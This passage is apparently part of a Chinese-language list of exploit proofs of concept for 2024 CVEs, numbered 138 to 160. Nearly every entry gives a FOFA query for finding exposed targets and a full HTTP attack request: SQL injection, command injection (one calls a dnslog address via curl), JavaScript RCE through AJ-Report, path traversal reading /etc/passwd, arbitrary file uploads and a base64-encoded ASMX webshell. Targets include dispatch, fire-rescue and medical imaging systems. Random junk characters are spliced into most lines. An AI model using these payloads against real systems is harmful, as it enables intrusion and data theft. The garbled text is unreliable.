& ]0 M3 `7 L: k! eAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& t8 b& B  L; K" _
Accept-Encoding: gzip, deflate, br
, M: \% \( K6 i0 C7 _Connection: close8 u/ b2 z) g* p" A4 z' O# `' T$ l% W
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj% k, P; I* B7 m! q
Upgrade-Insecure-Requests: 1
6 m9 [- m: ?: d9 r
* k! `1 D( Y$ O( }: ]
; ?* C' k! Y7 k3 c- u9 Q! W138. 福建科立讯通信指挥调度平台pwd_update.php sql注入8 [5 j" i! W  U" A& @8 T" R
CVE-2024-2621
1 m. R# E4 @0 N. g+ ?FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"" V* r* i9 a. h' {2 T2 m
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
; w+ l9 n$ R5 YHost: x.x.x.x
% d* K- `5 w) W, ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0( h. V+ D( P+ w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, W3 r5 M9 g( u0 s3 j
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* Q: q+ v* T& Z0 l' C( jAccept-Encoding: gzip, deflate, br8 Z. s7 L7 q" m
Connection: close
( j' y# G8 Q6 ?0 YUpgrade-Insecure-Requests: 1
+ a0 P+ x6 E  B& S  y* E; k" J
& j1 B0 O  q  w& V4 B
8 R7 M5 H1 @, W139. 福建科立讯通信指挥调度平台editemedia.php sql注入2 l- p2 V4 d. z/ l7 C
CVE-2024-26227 R" Z5 ^# i9 p& w1 @% g# O/ j
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"! x/ c$ }9 N8 w3 |
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
' p" `$ k* P3 ?3 YHost: x.x.x.x2 D$ W+ {- j, N/ P* {, N% v, j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0+ i9 x( r' ~+ z4 |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 }: R2 a2 V, d# W
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& h9 I  u( g4 Y, [2 P! G0 ZAccept-Encoding: gzip, deflate, br
1 H7 [( d! Y+ f* p- y( ]1 PConnection: close4 V, _5 n! i9 e8 a6 i( s( t; c
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
, h4 b4 j0 c1 n6 _6 L1 f$ MUpgrade-Insecure-Requests: 1' F3 {. z! [0 L7 k9 ]

* x# X1 o& I7 Y- I4 y3 `0 V$ R9 [; b. o8 @6 T9 O* P* f' ]
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
( Y5 K$ X, y" U" Y  h; HCVE-2024-2566/ n. d+ Z! g5 h  N+ C; ~
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
4 x+ D$ @; [7 _" M& z7 BGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1; |) w" i4 K& _; \
Host: x.x.x.x
+ X5 o, z4 C0 j! E8 d$ D! o+ `$ LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0- A; L% M3 `3 o( F3 m6 h
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, i/ E- t9 u8 Q9 Q! m( N
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 Y! s. s! F/ p4 P  ~. ?Accept-Encoding: gzip, deflate, br9 C9 W8 L+ z/ I& c3 |
Connection: close+ I( J6 j: a# S+ b, O7 b2 Z0 m
Cookie: authcode=h8g9
0 R6 |# J/ g; K7 @& F- [Upgrade-Insecure-Requests: 1
5 m4 i4 t: d) Z$ u( W6 P4 H& J- f1 r2 v$ r( f) y

, J* ^; [' ^7 d: |% ]141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
- f& I; X, X  A3 }  |0 u$ OFOFA:body="指挥调度管理平台"
  k& Q0 M; l) D, s3 v( ?" yPOST /app/ext/ajax_users.php HTTP/1.1
, ]& [! N2 J& j' G' t" Y0 k% zHost: your-ip
( B+ ~1 M- f2 k* oUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info- K8 _) k7 B: r! |! ]) S7 ]/ Z
Content-Type: application/x-www-form-urlencoded
- U' M/ E* {5 s7 f) n) K& o
4 g  T) I1 a3 A) c( N( h9 o
  ^6 l# r5 P  {) T2 }0 ldep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
- _0 q3 k/ M3 D& x6 S% ~7 s6 p0 G$ m) m& g

6 C! R/ j* i7 A' U, |1 K* E2 \142. CMSV6车辆监控平台系统中存在弱密码7 T1 j. z5 r$ S$ R3 {
CVE-2024-29666
) A# Q3 E( g9 b5 \3 R: qFOFA:body="/808gps/": h+ G& k# f( R
admin/admin
' _$ G0 _6 D9 ^7 t' X. o. u( p6 d143. Netis WF2780 v2.1.40144 远程命令执行; S2 y0 U, U9 ]: v  S6 [8 _+ j
CVE-2024-25850* y9 ]; _2 {# P* N% c; t- V$ Y
FOFA:title='AP setup' && header='netis'
9 O6 w( D2 j# m9 W+ jPAYLOAD
1 e( |0 r3 {, l( u
$ ~$ G0 Z$ Q5 v. ^. u+ z) h144. D-Link nas_sharing.cgi 命令注入
! n  O+ J% }$ V, K( r4 \. rFOFA:app="D_Link-DNS-ShareCenter"6 U$ Z2 [$ p! R) h! q
system参数用于传要执行的命令
! p1 Q* y4 L/ Q) u4 M, mGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.16 ^. C/ |: A& ?  b0 X4 Q# V
Host: x.x.x.x8 D5 e! e0 y9 y% W2 _
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
2 z2 q0 W0 u) ?Connection: close
, J. s- `# l7 N0 LAccept: */*
. e4 p6 E3 s$ x. kAccept-Language: en
- v) S& v8 z" c( gAccept-Encoding: gzip
% K' ^2 A) H2 k, K
& s4 E( B* o, y8 {/ G2 G0 ~4 N7 j/ Z7 H
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
5 A: l1 w6 V& t( s: v0 dCVE-2024-3400# X+ ]2 ?( {& C
FOFA:icon_hash="-631559155"
5 _: I9 Y% k* A) o! e. lGET /global-protect/login.esp HTTP/1.1# a  S+ O) Q# q; E1 Z9 r  n
Host: 192.168.30.112:1005
  f+ S. M! M. X9 L) t+ uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84( e; v0 l( ~4 ~2 w; y! k
Connection: close% I- ?& g. e; Y
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;" _4 s/ _. s" X) j+ @) G
Accept-Encoding: gzip
" g$ @; h( {* Z* m, H% w+ u4 @5 S# X3 y) T

: e7 Z- V6 X  ?  ?2 W9 v+ ^& |146. MajorDoMo thumb.php 未授权远程代码执行. c( }6 w% n* _* L' z$ g' g1 ~
CNVD-2024-02175
# h9 [4 {0 r* J! pFOFA:app="MajordomoSL"9 d" Z7 H9 s' A# |: |4 f' g: u
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
# C( }2 h7 v1 YHost: x.x.x.x
1 c* @$ A8 c" `( S' }; N8 W5 QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
. W8 ^1 W  e0 n% }* z' yAccept-Charset: utf-8
- ^( ^" h9 ?1 T0 DAccept-Encoding: gzip, deflate( U6 b: l& r' H7 r) s& A7 ~
Connection: close5 Q9 r7 B5 U( N/ [2 {

9 j' X$ ?" j/ t
: q, x6 v% P5 L+ e4 d9 E7 c, |9 J147. RaidenMAILD邮件服务器v.4.9.4-路径遍历% w% a  [8 X/ x! V7 M
CVE-2024-32399
8 g# g; s- S' u) x+ O" mFOFA:body="RaidenMAILD"
. b4 C0 V7 w3 [/ n( }8 F# Y: qGET /webeditor/../../../windows/win.ini HTTP/1.1
" ^: l$ w0 s( v; \! J3 C/ ^Host: 127.0.0.1:819 X  y8 k5 L& C, ]( ]6 s2 @5 Y
Cache-Control: max-age=0
6 V! a' e+ O7 gConnection: close* c/ S3 B5 }5 `2 p1 P
! P' ^- @+ i* K; @8 n% f& c+ |
3 _9 U) ?+ d, m' E/ D
148. CrushFTP 认证绕过模板注入
6 c, R. T' H, t! MCVE-2024-4040( t. ]1 I- @8 r5 S9 }8 K4 ]
FOFA:body="CrushFTP") y2 V: Q$ Y5 F$ n: A! u  E+ U
PAYLOAD# \, E6 k0 W" P+ @
' X' z9 k9 n* F+ ^( q, c( `# B7 T
149. AJ-Report开源数据大屏存在远程命令执行. E1 v1 k# q- @1 d
FOFA:title="AJ-Report"- a! _& ?( h. R$ u( z$ a' L
, ~$ ]2 X* b) S% S0 H
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
& l" Y" }  }8 x% T9 u3 {Host: x.x.x.x
! \  Y& g* d" T/ E9 eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
4 h9 P; e6 Z& F# z4 E* tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ J5 T' C) L) C3 r# FAccept-Encoding: gzip, deflate, br
6 u# t1 v( t$ B* l! v9 J; BAccept-Language: zh-CN,zh;q=0.98 I! \/ O8 x5 H* Q9 Q0 y! O( Z) ]
Content-Type: application/json;charset=UTF-88 V( `) q' o: [
Connection: close
; i1 _+ o. i6 n
0 R8 ]' B5 {1 V1 e' Z/ \{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
- N8 W) u) B2 y: S/ ]
# o8 M. R# u9 A3 O2 o, E150. AJ-Report 1.4.0 认证绕过与远程代码执行' y# F2 |; p0 t- W; n) k
FOFA:title="AJ-Report"0 \8 ]$ U3 }# }* h- ~8 L
POST /dataSetParam/verification;swagger-ui/ HTTP/1.16 W" q$ a9 x/ a5 m' [! m" b
Host: x.x.x.x" q3 I, H/ s0 ~4 A% b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
& v! T8 n& x8 X  NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 P$ s1 Y' @' X; j! @3 ~. C
Accept-Encoding: gzip, deflate, br/ ^8 @6 V3 b0 h
Accept-Language: zh-CN,zh;q=0.9, T6 z8 x1 j3 d. z3 ^  \- F
Content-Type: application/json;charset=UTF-8: D" s, u4 J  _' O6 H! j
Connection: close
. R3 @+ Y' g0 g3 Y) ?Content-Length: 339( T! _( R3 F! s7 E: m6 @

6 O* ^8 y* I& }/ |% R% C/ Z{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
) b) n* p. @1 N7 {9 |! o- v
' e. F; a. o: u1 j4 Q; O+ ~
+ A) A+ ~7 O, M6 M: j# }* T151. AJ-Report 1.4.1 pageList sql注入
" K( o+ B- y8 m/ t1 m1 xFOFA:title="AJ-Report"
) p  _* i( j7 Y4 sGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1' J- f. d0 h/ c% [5 t- ]3 |, C
Host: x.x.x.x
* @3 ~, `, B+ M0 cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.155 {+ i* l! N7 D! e; A" b, X# M
Connection: close
0 A' g- T5 B9 _Accept-Encoding: gzip* k( G6 L. q' E. X# a# r" O
' t2 r5 @1 }0 }+ c6 q, v/ ]

. W$ G% L& A- B! t/ K- Z152. Progress Kemp LoadMaster 远程命令执行
5 `/ k: E8 H/ i8 i3 JCVE-2024-1212
- F$ q! L2 y5 H* K/ k5 q) z. ELoadMaster <= 7.2.59.2 (GA)% c# Y6 Z. }- B2 b) m3 i. ~
LoadMaster<=7.2.54.8 (LTSF)
' U. ]) @" B2 t7 n6 D. k% S( uLoadMaster <= 7.2.48.10 (LTS)/ ~4 W6 g/ Y0 P8 E3 X' h: @
FOFA:body="LoadMaster"
3 D" l5 J* s  G9 SJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
9 I3 M/ q, F( KGET /access/set?param=enableapi&value=1 HTTP/1.1( V  ~1 l+ m, T* v, y
Host: x.x.x.x
3 I% u. L2 a$ w; BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1. y& W/ x# e) N" }$ b8 Z  S
Connection: close
( R& F4 ^: X; U* ?6 ]Accept: */*) |$ c9 }, S, b1 H
Accept-Language: en! J- p6 [- P/ l
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=$ w: M  e5 F. [  h- m/ _+ X
Accept-Encoding: gzip8 u6 s* p4 m2 H
( Y8 m" b' h# H5 q( o) f" h9 M

! C4 h! r8 C# b3 }- n6 g2 Z153. gradio任意文件读取
' f; D/ W: {3 O2 `  @* b+ yCVE-2024-1561FOFA:body="__gradio_mode__"+ F, n9 z  M+ _( g- s3 X
第一步,请求/config文件获取componets的id0 O9 b4 v+ Z# D0 v
http://x.x.x.x/config! x" ~+ r$ H% J
+ c# t" j+ s6 A' ?4 ?/ ?
2 n  W5 W1 \5 n' t9 s( M
第二步,将/etc/passwd的内容写入到一个临时文件+ c; H! K" U) E/ j3 z
POST /component_server HTTP/1.1. T9 }; C" [, C+ I( c
Host: x.x.x.x
% h3 j3 j% H7 v) k. b8 BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.34 k; _$ R6 e3 `& }4 Z4 D5 {5 K
Connection: close# J$ B( ]6 [5 m
Content-Length: 115
0 i: R! N& o$ G! M- r* K( ?9 FContent-Type: application/json
& F& g1 q. G! \0 TAccept-Encoding: gzip! i% M: q/ H% S1 M2 D

/ a+ k; t& W  z* E3 g0 i{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
0 U2 _3 n" A; G9 g
% d  }& @( E! J: D/ ~. C
0 O# T+ s" D. j1 A& q, s$ S第三步访问
4 v" i9 l) }/ u; x7 S* |http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd4 h- b, |% `- |' U: f* i4 B' `
8 E9 z0 a6 M  G5 g# @& ]2 K
/ ~$ E# N& s! t$ r( Z) g, c
154. 天维尔消防救援作战调度平台 SQL注入
$ N7 e$ t( Z; K8 `CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"; X, K3 c' `. L4 C' h9 E/ @
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
8 h& ~  [* j  D) @, W# |+ rHost: x.x.x.x
& _& m3 o2 h7 R. ]1 zContent-Length: 106
% {/ i: L, f  Y/ ^/ k% S4 [) w/ RCache-Control: max-age=03 [8 f, G; A! h, X/ o, c1 A, A
Upgrade-Insecure-Requests: 1
  U) J. f( s; y% e, I. K9 f0 ZOrigin: http://x.x.x.x; U% {) Z/ n; p' S$ s  o4 C
Content-Type: application/json
$ F0 Z  c. S& n; t6 yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
- R( f3 h" O3 P/ h3 ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  y/ m2 G5 m* eReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
% u8 t4 _6 \( i6 ]% o9 `2 z: u3 HAccept-Encoding: gzip, deflate
  @4 l" l$ `$ u3 ~# tAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.77 Z# p0 @: s4 F/ w6 V0 n+ @
Connection: close) v3 O" {/ R& Y: `9 [; _

2 [) E" a: n# F0 ^3 A: S: m! v2 c8 A{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
6 |( y( {9 d( v1 p8 S7 Y! y# S. n( _' {# E2 R7 _& L
6 p3 J; R/ T4 i
155. 六零导航页 file.php 任意文件上传
- R+ ^/ }% |! ]) F1 i9 L. h/ p3 n' gCVE-2024-34982) J; Y3 o. Z# H
FOFA:title=="上网导航 - LyLme Spage", B% |! F8 ]+ l: y: o6 |' F( @: b
POST /include/file.php HTTP/1.1
4 F3 T4 }2 q8 ^/ X* j/ g0 EHost: x.x.x.x1 r, e5 F' H: O4 L( A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
; ^3 T: V2 k8 j! C6 l  r* x! yConnection: close
+ J; P' m: @; l2 \3 ^, d0 g, F8 wContent-Length: 232. e! t5 i  B! n% E2 @. W& }
Accept: application/json, text/javascript, */*; q=0.01
. _& G+ \5 j' J8 `Accept-Encoding: gzip, deflate, br6 ^2 n+ ]. X5 a7 ]* A/ ^2 ^
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 e/ v9 E9 s- E; w1 QContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
' C' }2 G7 A6 p8 JX-Requested-With: XMLHttpRequest
5 b( E' t$ r5 A2 m% Y' _
3 T6 b2 u( J, C3 Q7 ?+ d- c-----------------------------qttl7vemrsold314zg0f
$ N0 v" P. C/ ^! A# N; FContent-Disposition: form-data; name="file"; filename="test.php"9 d" L2 E. Q9 J
Content-Type: image/png
, @! u  Q4 O$ m; k* g" |; F* [; T  |, F4 D1 H) Z; D* t4 m
<?php phpinfo();unlink(__FILE__);?>
7 O' W2 I8 P% H/ M6 A( j-----------------------------qttl7vemrsold314zg0f--
& h' ]! s- f4 X1 v+ b- @
$ g5 X3 ^) m/ t! m0 R+ \; g# J0 X& W. M, |0 `- _
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php1 M3 N5 j0 w  x( B

# w4 l5 q; B7 \) t156. TBK DVR-4104/DVR-4216 操作系统命令注入
) A5 `3 v9 P" k! c+ x+ @CVE-2024-3721! B0 o1 p( v+ {3 c" f; [
FOFA:"Location: /login.rsp"+ ^- J% U3 ^0 z/ p- l. D
·TBK DVR-4104
: v8 G# V$ x" m  d6 |·TBK DVR-42160 B2 x' ~; j# ]* B# s
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"/ X) |1 F$ o& [& F
3 }  S! g& b; W
) @" w6 ^4 j  [8 C
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
* N$ Q' e' N" S3 |; sHost: x.x.x.x$ B" H) Z' [8 f: i8 |$ J
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" f, Y2 {4 s3 F* U! P
Connection: close
( l, x) |& ], b# d# VContent-Length: 0, D! n* w& d# G3 {, _2 j
Cookie: uid=1
% |9 I1 ~7 }" cAccept-Encoding: gzip7 \0 K- f+ K6 @5 {0 O" D  Q
, G' g% Y/ T! h$ [( H5 r
' W1 O; k! o$ i
157. 美特CRM upload.jsp 任意文件上传6 c) x0 k2 ~4 a6 g1 C
CNVD-2023-06971
  `) P  c$ r* D; k" E5 PFOFA:body="/common/scripts/basic.js"
% q+ ~) c# s6 O5 F; VPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.13 G$ \9 P, N7 i
Host: x.x.x.x
7 ~; ^! b( Q1 r" y7 gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36: p0 x% x9 }& A
Content-Length: 709! k7 L  t- P3 Z0 P9 \1 @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 D% N2 G  b9 }1 A! J3 C
Accept-Encoding: gzip, deflate- S- V: y1 c# O1 e5 K/ ~$ P1 u7 v
Accept-Language: zh-CN,zh;q=0.9. |1 H* [' V3 R# O* G7 _
Cache-Control: max-age=0) d: ?1 u% i. Z
Connection: close, N. t, B4 r( D, N# l+ k$ y9 A! t1 `% {
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN  c- ?! C/ j: f9 \- |& F
Upgrade-Insecure-Requests: 1
. ], a; \) W; r% i  Y! Q% y# N/ g9 C7 {+ }( o
------WebKitFormBoundary1imovELzPsfzp5dN
& ^+ t" u4 q& |, Z: s5 W7 ?4 n3 u* bContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"4 D. x9 q+ ~0 C  q. p/ O& d7 D: `
Content-Type: application/octet-stream: f/ f8 Q6 F$ l; y

& y  `6 _/ ?1 Xnyhelxrutzwhrsvsrafb8 G$ v% g% ?; n% p, M  \
------WebKitFormBoundary1imovELzPsfzp5dN! B4 J( f- U# B0 X
Content-Disposition: form-data; name="key"
) A7 @5 C" @& r3 W$ f  t! C2 @; j0 `$ k6 V& q8 d6 V5 Q4 r# \
null
+ E3 v) j, v6 y/ F$ }1 n; l------WebKitFormBoundary1imovELzPsfzp5dN& R! l+ ^/ W- k9 e
Content-Disposition: form-data; name="form"" i1 y+ e6 U4 M! T6 u9 I
  C6 F' @; V# a7 X6 Y
null
9 a6 `. f" A& J. F3 G4 f------WebKitFormBoundary1imovELzPsfzp5dN* w9 L& z4 i' b" a$ l/ G( |
Content-Disposition: form-data; name="field"
/ Y0 N; E4 C4 d" S& a/ X) C# C2 R
8 l: T( H; S- F" z1 V6 \null( K: G* V7 e' W% A/ F
------WebKitFormBoundary1imovELzPsfzp5dN) x, u' h# l1 s4 S8 G5 j4 d0 R
Content-Disposition: form-data; name="filetitile"
, h" i. C4 z) G* s- S
) I& N* |4 i/ G1 d' ^' _. bnull
" u3 k+ [" d2 k2 a------WebKitFormBoundary1imovELzPsfzp5dN0 [$ w( ]5 Y- G( A- K
Content-Disposition: form-data; name="filefolder"
7 N, ^$ u* F) \
3 k% M( A( Q9 P' n1 enull
7 x! \/ T# r8 `) W; b+ x4 b------WebKitFormBoundary1imovELzPsfzp5dN--& \: _# a  v/ o1 W( ]
  Z- m7 ?' S4 R& Z6 b% d: e9 M

- b: W) |! u# whttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp, y9 e) B' i: r: a
6 X4 |! @" T, }: P6 `! l
158. Mura-CMS-processAsyncObject存在SQL注入
7 U8 ]& a3 @( W" D) t' Y8 {$ qCVE-2024-32640
6 ^/ \0 }) ~* V/ p1 q  JFOFA:"Generator: Masa CMS"
6 X$ C! z( u+ {- gPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1. D8 ~2 x  u: P5 V% A6 q
Host: {{Hostname}}
" B3 Q3 r' G  u2 fContent-Type: application/x-www-form-urlencoded
0 L7 n9 F' s, k# o2 }3 g7 o; r; R: ?! d: r) p1 `
object=displayregion&contenthistid=x\'&previewid=1
$ Q: d4 w! l, U- A' K* M# A# L" B$ h" ~( z' d8 |0 V& Z. l( _& F9 \0 |, y( S
5 J, L$ i7 z" |7 g0 j  }9 }
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传9 |7 q0 @( e9 `% G7 X
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
! l& i  s- c$ ~: I2 sPOST /webservices/WebJobUpload.asmx HTTP/1.13 c, z, {# V# N# ?" P" y2 X
Host: x.x.x.x
6 A- I) |9 M4 E1 |' V! n* EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
! |. v: u! o3 y# u6 EContent-Length: 1080
2 a  {  x6 D. ^$ W; Q8 v+ ]Accept-Encoding: gzip, deflate
( b; N0 ]1 \: [/ y' \  @Connection: close) D7 v: \9 a, ~. i# C. d
Content-Type: text/xml; charset=utf-8
3 t" o! i1 i! E) Z$ eSoapaction: "http://rainier/jobUpload") t+ X0 X3 X8 V. H, ?
6 a1 _8 x' W9 N- C$ _2 X
<?xml version="1.0" encoding="utf-8"?>1 K; I# t8 @* k0 [, c3 j: C( x4 |
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">; e  f/ ^* {( i/ |* s: S  P6 C  X
<soap:Body>! t2 a: r+ {+ q# _0 c7 R0 u- e
<jobUpload xmlns="http://rainier">
6 {& g1 {! Z% M" {: E<vcode>1</vcode>5 q! w0 ?. H1 L$ @
<subFolder></subFolder>. g) z. |2 @) }6 h/ Z8 F6 r
<fileName>abcrce.asmx</fileName>3 K- G: ~3 ~( s
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>  A8 b4 L5 x( x
</jobUpload>
- r+ V4 ~2 x8 V9 h+ b7 o</soap:Body>- P* p+ u4 G0 A5 u5 @1 ~, t
</soap:Envelope>
! J* M8 Q9 [3 S0 Y4 F$ f6 ^* e  o( p5 ^  _$ I2 C: G9 N

; G5 J6 l6 v$ X, f8 B, ?/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
, o: m, d5 g5 [6 D# v( W' x. J+ k* M" `2 k& |3 L

4 n. H* r+ z/ u1 N' ?$ F% y# J160. Sonatype Nexus Repository 3目录遍历与文件读取  d/ i* `6 P7 f9 y# \& o
CVE-2024-49567 Q! k' i1 Q0 I+ X+ G  d5 W
